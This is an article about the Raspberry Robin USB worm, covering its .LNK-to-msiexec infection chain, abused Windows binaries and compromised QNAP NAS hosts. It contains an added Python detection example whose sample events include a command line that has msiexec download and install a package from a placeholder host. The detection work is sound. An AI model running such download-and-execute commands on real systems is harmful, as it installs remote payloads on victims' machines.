A relatively new kind of Windows worm, known as Raspberry Robin, has been spreading from victim to victim across Europe, mainly via USB devices. Red Canary intelligence analysts initially discovered this worm in September 2021, and have warned Windows users of its potential threat to their devices.

USB Devices Are the Main Target of Raspberry Robin

The main vehicle of transfer for the Raspberry Robin worm is USB devices. An infected drive presents the victim with a .LNK file upon insertion, which infects the device through the command prompt by creating an msiexec process (msiexec.exe). Infected drives also carry a BAT file containing two commands.


Two additional Windows tools are abused by Raspberry Robin: fodhelper.exe and odbcconf.exe. Both are legitimate executables; the former is used to manage Windows features, while the latter configures ODBC (Open Database Connectivity) drivers. Leveraging these three legitimate Windows files makes Raspberry Robin harder to detect. The malware also communicates with the rest of its ecosystem through Tor exit nodes, which makes it trickier still to spot.
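As an added, defender-side illustration of the execution chain described above (not code from the article or from Red Canary): a small Python check over constructed process-creation events that flags msiexec.exe launched from cmd.exe with an HTTP URL on its command line and lists any fodhelper.exe or odbcconf.exe launches beneath it. The event fields, pids and the placeholder host name are assumptions.

```python
import re

# Constructed process-creation events, modelled loosely on Sysmon Event ID 1 fields.
# These are made-up samples for the demonstration, not telemetry from a real infection.
SAMPLE_EVENTS = [
    {"pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # .LNK on the USB drive opened from Explorer: cmd.exe starts msiexec with a URL
    {"pid": 11, "ppid": 10, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c msiexec /q /i http://compromised-nas.invalid/pkg"},
    {"pid": 12, "ppid": 11, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://compromised-nas.invalid/pkg"},
    # follow-on launches of the two living-off-the-land binaries named in the article
    {"pid": 13, "ppid": 12, "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": "odbcconf.exe"},
    {"pid": 14, "ppid": 12, "image": r"C:\Windows\System32\fodhelper.exe",
     "cmdline": "fodhelper.exe"},
    # benign: an administrator installing a local package from Explorer
    {"pid": 20, "ppid": 10, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\packages\app.msi"},
]

FOLLOW_ON_BINARIES = {"fodhelper.exe", "odbcconf.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def image_name(event):
    """Lower-cased file name of the process image, e.g. 'msiexec.exe'."""
    return event["image"].rsplit("\\", 1)[-1].lower()


def ancestor_pids(event, by_pid):
    """Walk ppid links upward and return the set of ancestor pids."""
    seen = set()
    while event["ppid"] in by_pid and event["ppid"] not in seen:
        seen.add(event["ppid"])
        event = by_pid[event["ppid"]]
    return seen


def find_raspberry_robin_chains(events):
    """Flag msiexec.exe spawned by cmd.exe with an HTTP(S) URL on its command line,
    and list fodhelper/odbcconf launches that descend from that msiexec."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if image_name(e) != "msiexec.exe" or parent is None:
            continue
        if image_name(parent) != "cmd.exe" or not URL_RE.search(e["cmdline"]):
            continue
        follow_ons = sorted(image_name(c) for c in events
                            if image_name(c) in FOLLOW_ON_BINARIES
                            and e["pid"] in ancestor_pids(c, by_pid))
        findings.append({"cmd_pid": parent["pid"], "msiexec_pid": e["pid"],
                         "follow_ons": follow_ons})
    return findings
```

The benign local msiexec install (pid 20) is not flagged because it is neither spawned by cmd.exe nor given a URL, which keeps the rule focused on the chain the article describes.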

QNAP NAS Devices Also a Raspberry Robin Target

Compromised QNAP NAS (Network-Attached Storage) devices are also exploited in the Raspberry Robin infection process: after the .LNK file is downloaded, the attacker uses HTTP requests that contain the victim's user and device names. The worm uses a malicious DLL (Dynamic-Link Library) from a compromised QNAP device to gain access to and control over the victim's system. QNAP devices have been exploited by attackers in the past for various reasons, particularly malware infection.

There's Still Lots More to Learn About Raspberry Robin

Raspberry Robin targets Windows users specifically, and hundreds of devices have already been affected. It is still not known how Raspberry Robin spreads from one USB drive to the next, which is a concern for infection mitigation. In a post on the Red Canary blog, the company states that it is dealing with "several intelligence gaps" around this wave of Raspberry Robin attacks, including the overall intention of the malware's operators.

Be Wary When Inserting USB Drives Into Your Computer

Raspberry Robin's dynamics and objectives are still not totally understood, which makes it harder for us to determine the true purpose and future of this malware. Windows users must therefore be vigilant about the USB drives that they choose to insert into any of their devices.